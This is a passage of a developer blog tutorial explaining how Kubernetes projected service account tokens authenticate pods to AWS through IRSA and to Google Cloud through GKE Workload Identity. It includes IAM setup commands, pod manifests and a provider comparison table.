&lt;/span&gt;aws iam create-policy &lt;span class="nt"&gt;--policy-name&lt;/span&gt; S3AccessPolicy &lt;span class="nt"&gt;--policy-document&lt;/span&gt; file://s3-policy.json

&lt;span class="c"&gt;# 4. Create an IAM role with a trust policy that allows the service account&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; trust-policy.json &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::ACCOUNT_ID:oidc-provider/oidc.eks.us-west-2.amazonaws.com/id/EXAMPLED539D4633E53DE1B71EXAMPLE"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "oidc.eks.us-west-2.amazonaws.com/id/EXAMPLED539D4633E53DE1B71EXAMPLE:sub": "system:serviceaccount:default:s3-access-sa",
          "oidc.eks.us-west-2.amazonaws.com/id/EXAMPLED539D4633E53DE1B71EXAMPLE:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;aws iam create-role &lt;span class="nt"&gt;--role-name&lt;/span&gt; s3-access-role &lt;span class="nt"&gt;--assume-role-policy-document&lt;/span&gt; file://trust-policy.json

&lt;span class="c"&gt;# 5. Attach the policy to the role&lt;/span&gt;
aws iam attach-role-policy &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; s3-access-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--policy-arn&lt;/span&gt; arn:aws:iam::ACCOUNT_ID:policy/S3AccessPolicy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Key Configuration Points:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Trust Policy Condition&lt;/strong&gt;: Must match &lt;code&gt;system:serviceaccount:&amp;lt;namespace&amp;gt;:&amp;lt;service-account-name&amp;gt;&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audience&lt;/strong&gt;: Must be &lt;code&gt;sts.amazonaws.com&lt;/code&gt; for IRSA&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OIDC Provider&lt;/strong&gt;: Must be registered as a trusted identity provider in IAM&lt;/li&gt;
&lt;/ul&gt;
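&lt;p&gt;Under IRSA the AWS SDK performs the final step for you: it reads the injected environment variables and calls &lt;code&gt;sts:AssumeRoleWithWebIdentity&lt;/code&gt;. A sketch of the parameters that call carries (the role ARN and session name are placeholders; with boto3 these map onto &lt;code&gt;sts_client.assume_role_with_web_identity&lt;/code&gt;):&lt;/p&gt;

```python
import tempfile

def assume_role_params(role_arn, token_file, session_name="irsa-demo"):
    """Parameters for sts:AssumeRoleWithWebIdentity as issued under IRSA."""
    with open(token_file) as f:
        web_identity_token = f.read().strip()  # the projected JWT
    return {
        "RoleArn": role_arn,
        "RoleSessionName": session_name,
        "WebIdentityToken": web_identity_token,
        "DurationSeconds": 3600,
    }

# Simulate the projected token file the kubelet would mount
with tempfile.NamedTemporaryFile("w", suffix=".jwt", delete=False) as tf:
    tf.write("header.payload.signature")

params = assume_role_params("arn:aws:iam::123456789012:role/s3-access-role", tf.name)
print(params["RoleArn"])
```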

&lt;h3&gt;
  
  
  EKS IRSA Configuration
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ServiceAccount&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;s3-access-sa&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;eks.amazonaws.com/role-arn&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;arn:aws:iam::ACCOUNT_ID:role/s3-access-role&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-irsa-demo&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;s3-access-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;amazon/aws-cli&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sleep"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;infinity"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="c1"&gt;# Note: The following are automatically injected by the EKS Pod Identity Webhook&lt;/span&gt;
    &lt;span class="c1"&gt;# when the service account has the annotation "eks.amazonaws.com/role-arn":&lt;/span&gt;
    &lt;span class="c1"&gt;#&lt;/span&gt;
    &lt;span class="c1"&gt;# Environment variables:&lt;/span&gt;
    &lt;span class="c1"&gt;# - AWS_ROLE_ARN: arn:aws:iam::ACCOUNT_ID:role/s3-access-role&lt;/span&gt;
    &lt;span class="c1"&gt;# - AWS_WEB_IDENTITY_TOKEN_FILE: /var/run/secrets/eks.amazonaws.com/serviceaccount/token&lt;/span&gt;
    &lt;span class="c1"&gt;#&lt;/span&gt;
    &lt;span class="c1"&gt;# Volume mounts:&lt;/span&gt;
    &lt;span class="c1"&gt;# - name: aws-iam-token&lt;/span&gt;
    &lt;span class="c1"&gt;#   mountPath: /var/run/secrets/eks.amazonaws.com/serviceaccount&lt;/span&gt;
    &lt;span class="c1"&gt;#   readOnly: true&lt;/span&gt;
    &lt;span class="c1"&gt;#&lt;/span&gt;
    &lt;span class="c1"&gt;# Volumes:&lt;/span&gt;
    &lt;span class="c1"&gt;# - name: aws-iam-token&lt;/span&gt;
    &lt;span class="c1"&gt;#   projected:&lt;/span&gt;
    &lt;span class="c1"&gt;#     sources:&lt;/span&gt;
    &lt;span class="c1"&gt;#     - serviceAccountToken:&lt;/span&gt;
    &lt;span class="c1"&gt;#         path: token&lt;/span&gt;
    &lt;span class="c1"&gt;#         expirationSeconds: 86400&lt;/span&gt;
    &lt;span class="c1"&gt;#         audience: sts.amazonaws.com&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Important&lt;/strong&gt;: In practice, when using EKS with IRSA, you typically only need to:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Annotate your service account with &lt;code&gt;eks.amazonaws.com/role-arn&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Reference that service account in your pod spec&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The pod spec would look like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eks-irsa-demo&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;s3-access-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;amazon/aws-cli&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sleep"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;infinity"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="c1"&gt;# Everything else is auto-injected!&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;EKS will automatically inject the environment variables, volume mounts, and projected volumes for you. The full configuration above is shown to illustrate what happens behind the scenes.&lt;/p&gt;
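&lt;p&gt;From the application's point of view, IRSA boils down to those two environment variables. The sketch below simulates the injection locally and reads it back the way an AWS SDK does on startup; the role ARN and token contents are stand-in values, and no real AWS call is made:&lt;/p&gt;

```shell
# Simulate what the EKS Pod Identity Webhook injects, then read it back the
# way an AWS SDK does on startup. Role ARN and token contents are stand-ins.
tokendir=$(mktemp -d)
printf 'fake.jwt.token' > "$tokendir/token"

export AWS_ROLE_ARN="arn:aws:iam::123456789012:role/s3-access-role"
export AWS_WEB_IDENTITY_TOKEN_FILE="$tokendir/token"

# An SDK calls sts:AssumeRoleWithWebIdentity with exactly these two inputs.
echo "role:  $AWS_ROLE_ARN"
echo "token: $(cat "$AWS_WEB_IDENTITY_TOKEN_FILE")"
```

&lt;p&gt;Inside a real pod you would see the genuine values with &lt;code&gt;kubectl exec eks-irsa-demo -- env | grep AWS_&lt;/code&gt;.&lt;/p&gt;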

&lt;p&gt;&lt;strong&gt;How it works in EKS:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwd486g2inxone51qib7o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwd486g2inxone51qib7o.png" alt="eks" width="800" height="527"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Using Projected Tokens with GKE (Google Kubernetes Engine)
&lt;/h2&gt;

&lt;p&gt;GKE uses projected tokens for &lt;strong&gt;Workload Identity&lt;/strong&gt;, enabling pods to authenticate as Google Cloud service accounts.&lt;/p&gt;

&lt;h3&gt;
  
  
  GCP-Side Configuration
&lt;/h3&gt;

&lt;p&gt;Before using Workload Identity in GKE, you need to configure Google Cloud:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1. Enable Workload Identity on your GKE cluster (if not already enabled)&lt;/span&gt;
gcloud container clusters update my-cluster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--workload-pool&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;PROJECT_ID.svc.id.goog

&lt;span class="c"&gt;# 2. Create a Google Cloud service account&lt;/span&gt;
gcloud iam service-accounts create gcs-access-sa &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"GCS Access Service Account"&lt;/span&gt;

&lt;span class="c"&gt;# 3. Grant the GCP service account permissions to Cloud resources&lt;/span&gt;
gcloud projects add-iam-policy-binding PROJECT_ID &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:gcs-access-sa@PROJECT_ID.iam.gserviceaccount.com"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/storage.objectViewer"&lt;/span&gt;

&lt;span class="c"&gt;# 4. Create the IAM policy binding between the Kubernetes SA and GCP SA&lt;/span&gt;
gcloud iam service-accounts add-iam-policy-binding &lt;span class="se"&gt;\&lt;/span&gt;
  gcs-access-sa@PROJECT_ID.iam.gserviceaccount.com &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/iam.workloadIdentityUser"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:PROJECT_ID.svc.id.goog[default/gke-workload-identity-sa]"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Key Configuration Points:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Workload Identity Pool&lt;/strong&gt;: Format is &lt;code&gt;PROJECT_ID.svc.id.goog&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Member Binding&lt;/strong&gt;: Must match &lt;code&gt;serviceAccount:PROJECT_ID.svc.id.goog[&amp;lt;namespace&amp;gt;/&amp;lt;ksa-name&amp;gt;]&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Role&lt;/strong&gt;: The GCP service account needs &lt;code&gt;roles/iam.workloadIdentityUser&lt;/code&gt; for the K8s SA&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The member format breaks down as:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;PROJECT_ID.svc.id.goog&lt;/code&gt; - Your workload identity pool&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;[default/gke-workload-identity-sa]&lt;/code&gt; - &lt;code&gt;[namespace/kubernetes-service-account]&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
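&lt;p&gt;Because the binding silently fails to match if any part of this string is off, it can help to assemble it from variables rather than typing it inline. A minimal shell sketch (the project, namespace, and service account values are placeholders):&lt;/p&gt;

```shell
# Assemble the Workload Identity member string from its parts.
# PROJECT_ID, NAMESPACE, and KSA_NAME are placeholder values.
PROJECT_ID="my-project"
NAMESPACE="default"
KSA_NAME="gke-workload-identity-sa"

MEMBER="serviceAccount:${PROJECT_ID}.svc.id.goog[${NAMESPACE}/${KSA_NAME}]"
echo "${MEMBER}"
```

&lt;p&gt;The resulting string is what gets passed as &lt;code&gt;--member&lt;/code&gt; in step 4 above.&lt;/p&gt;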

&lt;h3&gt;
  
  
  GKE Workload Identity Setup
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ServiceAccount&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-workload-identity-sa&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;iam.gke.io/gcp-service-account&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-gsa@PROJECT_ID.iam.gserviceaccount.com&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-workload-identity-demo&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-workload-identity-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;google/cloud-sdk:slim&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sleep"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;infinity"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="c1"&gt;# Note: GKE Workload Identity automatically configures the GCP metadata server&lt;/span&gt;
    &lt;span class="c1"&gt;# in the pod. Application Default Credentials (ADC) will automatically work&lt;/span&gt;
    &lt;span class="c1"&gt;# without needing explicit volume mounts or environment variables.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;How it works in GKE:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqnsbrzcaf2lo3pl3jhb7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqnsbrzcaf2lo3pl3jhb7.png" alt="gke" width="800" height="527"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note on GKE and Projected Volumes&lt;/strong&gt;: Unlike AKS and EKS, GKE's Workload Identity primarily works through metadata server emulation. You can optionally use projected service account tokens with a specific audience if you need direct access to the Kubernetes token, but this is rarely necessary. Most applications using Google Cloud client libraries will authenticate automatically through the metadata server without any explicit volume configuration.&lt;/p&gt;
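&lt;p&gt;If you do need the raw Kubernetes token on GKE, for example to exchange it yourself against a token endpoint, you can request a projected token with an explicit audience. The fragment below is a hedged sketch; the audience string, mount path, and expiration are illustrative choices, not fixed GKE values:&lt;/p&gt;

```yaml
# Optional on GKE: mount a projected service account token with an explicit
# audience. The audience, path, and expiration below are illustrative.
spec:
  containers:
  - name: app
    image: google/cloud-sdk:slim
    volumeMounts:
    - name: wi-token
      mountPath: /var/run/secrets/tokens
      readOnly: true
  volumes:
  - name: wi-token
    projected:
      sources:
      - serviceAccountToken:
          path: token
          expirationSeconds: 3600
          audience: my-custom-audience
```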

&lt;h2&gt;
  
  
  Cloud Provider Comparison
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Trust Relationship Overview
&lt;/h3&gt;

&lt;p&gt;All three cloud providers use a similar pattern: establishing trust between the Kubernetes service account and cloud provider IAM system through OIDC federation.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fltupeo875hidg9m3ivta.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fltupeo875hidg9m3ivta.png" alt="trust relationship overview" width="800" height="527"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Provider-Specific Comparison
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj9lyj69hgodcj8h57tk6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj9lyj69hgodcj8h57tk6.png" alt="product specific comparison" width="800" height="527"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;AKS&lt;/th&gt;
&lt;th&gt;EKS&lt;/th&gt;
&lt;th&gt;GKE&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Trust Mechanism&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Federated Identity Credential&lt;/td&gt;
&lt;td&gt;IAM OIDC Provider + Trust Policy&lt;/td&gt;
&lt;td&gt;Workload Identity Pool Binding&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Subject Format&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;system:serviceaccount:ns:sa&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;system:serviceaccount:ns:sa&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;serviceAccount:PROJECT.svc.id.goog[ns/sa]&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Audience&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;api://AzureADTokenExchange&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;sts.amazonaws.com&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://iam.googleapis.com/...&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;K8s Annotation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;azure.workload.identity/client-id&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;eks.amazonaws.com/role-arn&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;iam.gke.io/gcp-service-account&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Pod Label Required&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;azure.workload.identity/use: "true"&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Auto-Injection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes (via webhook)&lt;/td&gt;
&lt;td&gt;Yes (via webhook)&lt;/td&gt;
&lt;td&gt;Yes (metadata server)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Env Variables Injected&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;AZURE_CLIENT_ID&lt;/code&gt;, &lt;code&gt;AZURE_TENANT_ID&lt;/code&gt;, etc.&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;AWS_ROLE_ARN&lt;/code&gt;, &lt;code&gt;AWS_WEB_IDENTITY_TOKEN_FILE&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;None (uses metadata server)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Volume Auto-Mount&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Typically not needed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cloud IAM Setup&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Federated credential on App/MI&lt;/td&gt;
&lt;td&gt;IAM Role with trust policy&lt;/td&gt;
&lt;td&gt;IAM binding with workloadIdentityUser&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  Key Benefits Across All Platforms
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;No Long-Lived Credentials&lt;/strong&gt;: Tokens expire automatically, reducing security risk&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Automatic Rotation&lt;/strong&gt;: The kubelet handles token refresh transparently&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Fine-Grained Access&lt;/strong&gt;: Audience scoping limits token usage&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cloud Integration&lt;/strong&gt;: Seamless authentication to cloud provider services&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Least Privilege&lt;/strong&gt;: Each pod gets only the permissions it needs&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Best Practices
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Set appropriate expiration times&lt;/strong&gt;: Balance between security (shorter) and performance (fewer rotations)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Use specific audiences&lt;/strong&gt;: Scope tokens to their intended use&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Monitor token usage&lt;/strong&gt;: Track authentication patterns for security insights&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Follow cloud provider guides&lt;/strong&gt;: Each platform has specific setup requirements&lt;/li&gt;
